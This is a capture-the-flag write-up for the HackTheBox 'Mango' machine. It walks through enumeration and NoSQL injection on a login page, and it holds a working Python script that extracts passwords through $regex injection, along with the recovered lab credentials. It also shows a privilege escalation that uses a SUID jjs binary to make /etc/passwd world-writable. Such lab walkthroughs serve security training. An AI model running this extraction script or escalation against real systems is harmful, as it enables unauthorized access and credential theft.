HackTheBox - Mango

Nmap scan results

We have two webservers, one running with HTTP and other with HTTPS (Secure). Let's add staging-order.mango.htb to /etc/hosts file. There are two different websites running on staging-order.mango.htb. One on HTTP Protocol and other on HTTPS.

HTTPS Website

HTTP Website

I tried for SQL Injection on Mango Search Page but didn't get anything. Let's scan the website with gobuster for files and directories.

Scanning with gobuster

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://staging-order.mango.htb/ -x php,html,txt -o go-dirscan.out -t 50

The login page for insecure i.e HTTP website looks suspicious. Let's try SQL Injection on that.

Trying SQL Injection on login page

I tried all possible SQL Injection payloads but that didn't gave me anything. Also tried sqlmap tool to automate the process but no luck :((

Performing NoSQL Injection on login page

We can also try for NoSQL Injection as the name of the box is similar to Mongo which is a NoSQL database (Uses Key-Value pair to store the values)

NoSQL injection - HackTricksbook.hacktricks.xyz

NoSQL injection vulnerabilities allow attackers to inject code into commands for databases that don't use SQL queries, such as MongoDB.

And now if you will check the response, it will be a redirect to home.php page.

Extracting usernames and passwords

But that doesn't give us anything. We can also enumerate the data and users using the same method. I have created a script to get all the users and their passwords.

#!/usr/bin/env python

import requests
import string

url = "http://staging-order.mango.htb/index.php"
#chars = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!&(),-:;<=>@^_{}~`-[]?+"
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]

proxies = {'http':"127.0.0.1:8080"}
passw = "^"

for i in range(20):
    print "[+] Position: %s" % i
    for char in possible_chars:
        payload = {
                "username[$eq]" : "admin",
                "password[$regex]" : "{}".format(passw + char),
                "login" : "login"
        }
        res = requests.post(url,data=payload,allow_redirects=True)
        if "admin@mango.htb" in res.text:
            print("[+] Found: %s" % (passw + char))
            passw += char
            break
        else:
            pass
            
print "[+] Completed"

Similarly we can also enumerate the user and get password for that user as well.

# Got creds
admin : t9KcS3>!0B#2
mango : h3mXK8RhU~f{]f5H

Using SSH to get access as mango user

Using previously found password for admin

Privilege Escalation using jjs (Java JavaScript)

If you wonder what jjs stands for, it stands for Java JavaScript. The command is located in the JDK_HOME\bin directory. The command can be used to run scripts in files or scripts entered on the command-line in interactive mode. It can also be used to execute shell scripts.

find / -perm -u=s -type f 2>/dev/null

// JJS Script to get command execution
Java.type('java.lang.Runtime').getRuntime().exec('chmod 777 /etc/passwd')

Now we can edit the /etc/passwd file and change the root password. - This is one way

Another way is to copy the bash file to tmp directory and then changing its permission to 4555 (Setuid permissions)